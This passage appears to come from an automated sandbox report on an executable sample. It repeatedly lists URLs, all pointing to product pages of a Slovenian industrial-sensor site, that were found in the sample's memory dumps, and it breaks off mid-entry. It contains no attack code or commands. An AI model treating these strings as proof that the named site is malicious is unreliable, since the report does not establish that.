              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/nivojsk
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/regulac
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/varnost
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/zvezna-
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/dodatni-pribo
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/inteligentni-
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/membranski-ve
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/mollet-molosc
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/naprave-za-tl
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/nivojska-stik
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/zvezni-meriln
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-nivojno-ohisje
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-prikazovalniki
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/dodatki-za-merilce-ni
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 